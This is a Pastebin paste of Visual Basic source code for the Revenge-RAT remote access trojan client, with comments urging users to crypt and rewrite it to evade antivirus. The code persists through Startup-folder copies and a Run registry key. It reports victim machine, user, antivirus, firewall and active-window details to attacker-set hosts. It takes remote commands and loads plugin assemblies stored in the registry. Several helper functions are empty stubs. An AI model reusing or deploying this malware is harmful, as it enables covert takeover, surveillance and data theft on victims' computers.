API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Nov 18th, 2019
356
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 15.72 KB | None | 0 0
raw download clone embed print report
  1. ' Fixed By NYAN CAT \\ NOV 25TH, 2018
  2.  
  3. ' Revenge-RAT Client Source Code v0.3
  4. ' By N A P O L E O N
  5. ' You can update/Crypt the client again, learn if you want , some codes typed direct for beginners
  6. ' if you want good result in runtime vs AV, rewrite some functions much as you can
  7. ' Last edit: 2016/12/9
  8. Imports System.Environment
  9. Imports System.Management, Microsoft.VisualBasic.Devices, System.Collections.Generic, System.Diagnostics, System.Windows.Forms, System.Globalization, System.IO.Compression, System.Net, System.Threading, Microsoft.Win32, System.Text, System.IO
  10. Imports System.Runtime.CompilerServices
  11. Imports Microsoft.VisualBasic.CompilerServices
  12.  
  13. Public Class Atomic
  14. Public OW As Boolean = False
  15. Public C As Object = Nothing
  16. Public Cn As Boolean = False
  17. <Obsolete>
  18. Public SC = New Thread(AddressOf MAC, 1)
  19. Public PT As New Thread(AddressOf Pin)
  20. Public I As Integer = 1
  21. Public MS As Integer = 0
  22.  
  23. '########################################################
  24. Public Hosts As String() = Split(",", ",") 'Your IP
  25. Public Ports As String() = Split(",", ",") 'Your Port
  26. Public Shared Key As String = "" 'Your Key
  27. '########################################################
  28.  
  29. Public ID As String = "TllBTi1DQVQ="
  30. Public MUTEX As String = "RV_MUTEX-FZMONFueOciq"
  31. Public H As Integer = 0
  32. Public P As Integer = 0
  33. Public Shared SPL As String = "*-]NK[-*"
  34. Public Shared App As String = Application.ExecutablePath
  35. Public Shared SCG As New Atomic
  36. Public Shared DI As ComputerInfo = New ComputerInfo
  37. Public Shared MT As Mutex
  38. Public Shared Tick As System.Threading.Timer = Nothing
  39. Private ahaR As Object
  40. Private __ As Object
  41.  
  42. <Obsolete>
  43. Shared Sub Main()
  44. SCG.Execute()
  45. End Sub
  46.  
  47. <Obsolete>
  48. Sub Execute()
  49. Try : MT = New Mutex(True, MUTEX, OW) : If Not OW Then End : AddHandler Application.ApplicationExit, Sub() MT.ReleaseMutex()
  50. Catch : End Try
  51. SC.Start() : PT.Start()
  52. End Sub
  53.  
  54. Sub Pin()
  55. RE: If I = 0 Then : MS += 1 : End If : Thread.Sleep(1) : GoTo RE
  56. End Sub
  57.  
  58. Sub data(ByVal b As Byte()) ' receive commands from RV-RAT
  59. Dim Rev As String() = Split(BS(b), Key)
  60. If Rev(0) = "PNC" Then
  61. I = 0
  62. Send("PNC")
  63. ElseIf Rev(0) = "P" Then
  64. I = 1
  65. Send("P" & Key & MS)
  66. MS = 0
  67. Send("W" & Key & GAW())
  68. ElseIf Rev(0) = "IE" Then ' Ask about plugin
  69. If Not Registry.CurrentUser.OpenSubKey("Software\" & Encode(MUTEX) & "\" & Rev(1), True) Is Nothing Then : Try : INV(Hosts(H), Ports(P), Rev(4), Rev(5), Encode(Decode(ID) & "_" & HWD()), Registry.GetValue("HKEY_CURRENT_USER\SOFTWARE\" & Encode(MUTEX) & "\" & Rev(1), Rev(1), Nothing).ToString, Rev(2), Rev(3), Rev(1), True) : Catch : Send("GPL" & Key & Rev(5) & Key & Rev(1) & Key & False) : End Try : Else : Send("GPL" & Key & Rev(5) & Key & Rev(1) & Key & False) : End If
  70. ElseIf Rev(0) = "LP" Then ' invoke plugin
  71. INV(Hosts(H), Ports(P), Rev(1), Rev(2), Encode(Decode(ID) & "_" & HWD()), Rev(3), Rev(4), Rev(5), Rev(6), Rev(7))
  72. ElseIf Rev(0) = "UNV" Then ' uninstall - restart - close .. etc
  73. LA(Rev(1)).CreateInstance(Rev(2)).UNI(Encode(MUTEX), Rev(3), Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Rev(4), Rev(5), App, Rev(6), Rev(7), Rev(8), Rev(9), Rev(10), Rev(11), Rev(12), Rev(13))
  74. End If
  75. End Sub
  76. Public Sub INS()
  77. Try
  78. ahaR.MT = New Mutex(True, Me.MUTEX, Me.OW)
  79. If Not Me.OW Then
  80. ProjectData.EndApp()
  81. AddHandler Application.ApplicationExit, If((_Closure().IR24 - 1 Is Nothing), _Closure().IR24 - 1 = New EventHandler(AddressOf _Closure().I.Lambda_R24 - 1), _Closure().IR24 - 1)
  82. End If
  83. Catch exception1 As Exception
  84. ProjectData.SetProjectError(exception1)
  85. ProjectData.ClearProjectError()
  86. End Try
  87. Thread.Sleep(&H88B8)
  88. Dim destFileName As String = String.Empty
  89. Try
  90. destFileName = (Environment.GetFolderPath(DirectCast(Conversions.ToInteger("26"), SpecialFolder)) & "\Client.exe")
  91. File.Copy(ahaR.App, destFileName, True)
  92. Process.Start(destFileName)
  93. ProjectData.EndApp()
  94. Catch exception2 As Exception
  95. ProjectData.SetProjectError(exception2)
  96. ProjectData.ClearProjectError()
  97. End Try
  98. Try
  99. destFileName = (Environment.GetFolderPath(SpecialFolder.Startup) & "\Client.exe")
  100. File.Copy(ahaR.App, destFileName, True)
  101. Catch exception3 As Exception
  102. ProjectData.SetProjectError(exception3)
  103. ProjectData.ClearProjectError()
  104. End Try
  105. Try
  106. Me.IR("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "Client", ahaR.App)
  107. Catch exception4 As Exception
  108. ProjectData.SetProjectError(exception4)
  109. ProjectData.ClearProjectError()
  110. End Try
  111. End Sub
  112.  
  113. Private Function Hid() As Boolean
  114. Throw New NotImplementedException()
  115. End Function
  116.  
  117. Private Sub USBspr(v As Boolean)
  118. Throw New NotImplementedException()
  119. End Sub
  120.  
  121. Private Function Spr() As Boolean
  122. Throw New NotImplementedException()
  123. End Function
  124.  
  125. Private Function FS() As FileStream
  126. Throw New NotImplementedException()
  127. End Function
  128.  
  129. Private Function RG() As Object
  130. Throw New NotImplementedException()
  131. End Function
  132.  
  133. Private Function sf() As Object
  134. Throw New NotImplementedException()
  135. End Function
  136.  
  137. Private Function IsF() As Boolean
  138. Throw New NotImplementedException()
  139. End Function
  140.  
  141. Private Function F() As Object
  142. Throw New NotImplementedException()
  143. End Function
  144.  
  145. Private Function Isu() As Boolean
  146. Throw New NotImplementedException()
  147. End Function
  148.  
  149. Private Function EXE() As Object
  150. Throw New NotImplementedException()
  151. End Function
  152.  
  153. Private Function DR() As Integer
  154. Throw New NotImplementedException()
  155. End Function
  156.  
  157. Private Function LO() As Object
  158. Throw New NotImplementedException()
  159. End Function
  160.  
  161. Private Function CompDir(lO As Object, fileInfo As FileInfo) As Boolean
  162. Throw New NotImplementedException()
  163. End Function
  164.  
  165. Private Function Idr() As Boolean
  166. Throw New NotImplementedException()
  167. End Function
  168.  
  169. Private Function IR24() As Integer
  170. Throw New NotImplementedException()
  171. End Function
  172.  
  173. Private Function _Closure() As Object
  174. Throw New NotImplementedException()
  175. End Function
  176.  
  177. Public Function INV(ByVal H As String, P As String, N As String, C As String, ID As String, Bytes As String, S As Integer, M As Boolean, MD5 As String, B As Boolean) ' invoke plugin
  178. LA(Bytes).CreateInstance(N & "." & C, True).Start(ID, S, H, P, Key, SPL) : If M Then : Try : If Registry.CurrentUser.OpenSubKey("Software\" & Encode(MUTEX) & "\" & MD5, True) Is Nothing Then : IR("HKEY_CURRENT_USER\SOFTWARE\" & Encode(MUTEX) & "\" & MD5, MD5, Bytes) : End If : Catch : End Try : If B = False Then : IR("HKEY_CURRENT_USER\SOFTWARE\" & Encode(MUTEX) & "\" & MD5, MD5, Bytes) : End If : End If
  179. End Function
  180.  
  181. Public Function LA(B As String) ' load assembly
  182. Return Reflection.Assembly.Load(Decompress(Convert.FromBase64String(B)))
  183. End Function
  184.  
  185. Public Function IR(ByVal P As String, N As String, B As String) ' add reg value
  186. Try : Registry.SetValue(P, N, B) : Catch : End Try
  187. End Function
  188.  
  189. <Obsolete>
  190. Sub MAC()
  191.  
  192. Dim M As Object = New MemoryStream
  193. Dim lp As Integer = 0
  194. re:
  195. Try : Try : EmptyWorkingSet(Process.GetCurrentProcess.Handle) : Catch : End Try : Catch : End Try
  196. Try
  197. If C Is Nothing Then GoTo e
  198. If C.Client.Connected = False Then GoTo e
  199. If Cn = False Then GoTo e
  200. lp += 1
  201. If lp > 300 Then
  202. lp = 0
  203. If C.Client.Poll(-1, Sockets.SelectMode.SelectRead) And C.Client.Available <= 0 Then GoTo e
  204. End If
  205. If C.Available > 0 Then
  206. Dim B(C.Available - 1) As Byte
  207. C.Client.Receive(B, 0, B.Length, Sockets.SocketFlags.None)
  208. M.Write(B, 0, B.Length)
  209. rr:
  210. If BS(M.ToArray).Contains(SPL) Then
  211. Dim A As Array = fx(M.ToArray, SPL)
  212. Dim T As New Thread(AddressOf data)
  213. T.Start(A(0))
  214. M.Dispose()
  215. M = New IO.MemoryStream
  216. If A.Length = 2 Then
  217. M.Write(A(1), 0, A(1).length)
  218. GoTo rr
  219. End If
  220. End If
  221. End If
  222. Catch
  223. GoTo e
  224. End Try
  225. Thread.CurrentThread.Sleep(1)
  226. GoTo re
  227. e:
  228. Try : Try : EmptyWorkingSet(Process.GetCurrentProcess.Handle) : Catch : End Try : Catch : End Try
  229. Cn = False
  230. Try
  231. C.Client.Disconnect(False)
  232. Catch
  233. End Try
  234. Try
  235. M.Dispose()
  236. Catch
  237. End Try
  238. Try
  239. Tick.Dispose()
  240. Catch
  241. End Try
  242. M = New MemoryStream
  243. Dim IC As Boolean = False
  244. For Count As Integer = 0 To Hosts.Length - 2
  245. Try
  246. C = New Sockets.TcpClient() With {.ReceiveTimeout = -1, .SendTimeout = -1, .SendBufferSize = 999999, .ReceiveBufferSize = 999999}
  247. lp = 0
  248. CK().Connect(Hosts(Count), Ports(Count))
  249. Cn = True
  250.  
  251. Send("Information" & Key & ID & Key & Encode("_" & HWD()) & Key & IP() & Key & Encode(Environment.MachineName & " / " & Environment.UserName) & Key & CIVC() & Key & Encode(DI.OSFullName & " " & OP()) & Key & Encode(MP()) & Key & DI.TotalPhysicalMemory & Key & GetProduct("Select * from AntiVirusProduct") & Key & GetProduct("SELECT * FROM FirewallProduct") & Key & Ports(P) & Key & GAW() & Key & Encode(CultureInfo.CurrentCulture.Name) & Key & "False") ' RVUS for make this client special color in lv , true for spread , RVUS for you , and false mean this client didn't come from spread
  252. H = Count
  253. P = Count
  254. IC = True
  255. Dim T As New TimerCallback(AddressOf Ping)
  256. Tick = New Threading.Timer(T, Nothing, 10000, 30000)
  257. GoTo re
  258. Catch
  259. Thread.Sleep(5000) ' replace it for reconnect time in ms , like 2500 or 5000
  260. H = 0
  261. P = 0
  262. End Try
  263. Next
  264. If IC = True Then
  265. IC = False
  266. GoTo e
  267. End If
  268. GoTo re
  269. End Sub
  270.  
  271. Sub Ping()
  272. Send("alive??")
  273. End Sub
  274.  
  275. Function CK()
  276. Return C.Client
  277. End Function
  278.  
  279. Public Sub Send(ByVal b As Byte())
  280. If Cn = False Then Exit Sub
  281. Try
  282. Dim r As Object = New MemoryStream
  283. r.Write(b, 0, b.Length)
  284. r.Write(SB(SPL), 0, SPL.Length)
  285. C.Client.SendBufferSize = b.Length
  286. C.Client.Poll(-1, Net.Sockets.SelectMode.SelectWrite)
  287. C.Client.Send(r.ToArray, 0, r.Length, Sockets.SocketFlags.None)
  288. r.Dispose()
  289. Catch
  290. Cn = False
  291. End Try
  292. End Sub
  293.  
  294. Public Sub Send(ByVal S As String)
  295. Send(SB(S))
  296. End Sub
  297.  
  298. <Obsolete>
  299. Public Function IP()
  300. Try : Return CType(Dns.GetHostByName(Dns.GetHostName()).AddressList.GetValue(0), IPAddress).ToString() : Catch : Return "????" : End Try
  301. End Function
  302.  
  303. Private Declare Function GVI Lib "kernel32" Alias "GetVolumeInformationA" (ByVal IP As String, ByVal V As String, ByVal T As Integer, ByRef H As Integer, ByRef Q As Integer, ByRef G As Integer, ByVal J As String, ByVal X As Integer) As Integer : Private Declare Function GFW Lib "user32" Alias "GetForegroundWindow" () As IntPtr : Private Declare Auto Function GetWindowText Lib "user32" (ByVal hWnd As IntPtr, ByVal lpString As StringBuilder, ByVal cch As Integer) As Integer : Declare Function capGetDriverDescriptionA Lib "avicap32.dll" (ByVal wDriver As Short, ByVal lpszName As String, ByVal cbName As Integer, ByVal lpszVer As String, ByVal cbVer As Integer) As Boolean
  304. <Runtime.InteropServices.DllImport("psapi")>
  305. Public Shared Function EmptyWorkingSet(ByVal hProcess As Long) As Boolean
  306. End Function
  307.  
  308. Public Function HWD() As String
  309. Try : Dim HSN As Integer : GVI(Environ("SystemDrive") & "\", Nothing, Nothing, HSN, 0, 0, Nothing, Nothing) : Return Hex(HSN) : Catch : Return "ERR" : End Try
  310. End Function
  311.  
  312. Public Function CIVC() As String
  313. Try : For i As Integer = 0 To 4 : If capGetDriverDescriptionA(i, Space(100), 100, Nothing, 100) Then : Return "Yes" : End If : Next : Catch : End Try : Return "No"
  314. End Function
  315.  
  316. Public Shared Function OP() As String
  317. Try : For Each SC As ManagementObject In New ManagementObjectSearcher("select * from Win32_Processor").[Get]() : Return Convert.ToInt32(SC("AddressWidth")) : Next : Catch : Return "????" : End Try
  318. End Function
  319.  
  320. Public Function GetProduct(ByVal Product As String) As String
  321. Try : Dim PN As String = String.Empty : For Each AV As ManagementObject In New ManagementObjectSearcher("root\SecurityCenter" & IIf(DI.OSFullName.Contains("XP"), "", "2").ToString, Product).Get : PN &= AV("displayName").ToString : Next : If Not PN = String.Empty Then : Return Encode(PN) : Else : Return Encode("N/A") : End If : Catch : Return Encode("N/A") : End Try
  322. End Function
  323.  
  324. Public Function MP()
  325. Try : Return Registry.GetValue("HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0", "ProcessorNameString", Nothing).ToString : Catch : Return "????" : End Try
  326. End Function
  327.  
  328. Public Function GAW() As String
  329. Dim W As New StringBuilder(256) : GetWindowText(GFW(), W, W.Capacity) : Return Encode(W.ToString())
  330. End Function
  331.  
  332. Function SB(ByVal s As String) As Byte()
  333. Return Encoding.Default.GetBytes(s)
  334. End Function
  335.  
  336. Function BS(ByVal b As Byte()) As String
  337. Return Encoding.Default.GetString(b)
  338. End Function
  339.  
  340. Function fx(ByVal b As Byte(), ByVal WRD As String) As Array
  341. Dim a As New List(Of Byte()), M As New MemoryStream, MM As New MemoryStream, T As String() = Split(BS(b), WRD) : M.Write(b, 0, T(0).Length) : MM.Write(b, T(0).Length + WRD.Length, b.Length - (T(0).Length + WRD.Length)) : a.Add(M.ToArray) : a.Add(MM.ToArray) : M.Dispose() : MM.Dispose() : Return a.ToArray
  342. End Function
  343.  
  344. Public Function Decompress(data As Byte()) As Byte()
  345. Dim input As New MemoryStream() : input.Write(data, 0, data.Length) : input.Position = 0
  346. Dim gzip As New GZipStream(input, CompressionMode.Decompress, True), output As New MemoryStream(), buff As Byte() = New Byte(63) {}, read As Integer = -1
  347. read = gzip.Read(buff, 0, buff.Length) : While read > 0 : output.Write(buff, 0, read) : read = gzip.Read(buff, 0, buff.Length) : End While : gzip.Close() : Return output.ToArray()
  348. End Function
  349.  
  350. Public Function Encode(ByVal Input As String)
  351. Return Convert.ToBase64String(Encoding.UTF8.GetBytes(Input))
  352. End Function
  353.  
  354. Public Function Decode(ByVal Input As String)
  355. Return Encoding.UTF8.GetString(Convert.FromBase64String(Input))
  356. End Function
  357.  
  358. End Class
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!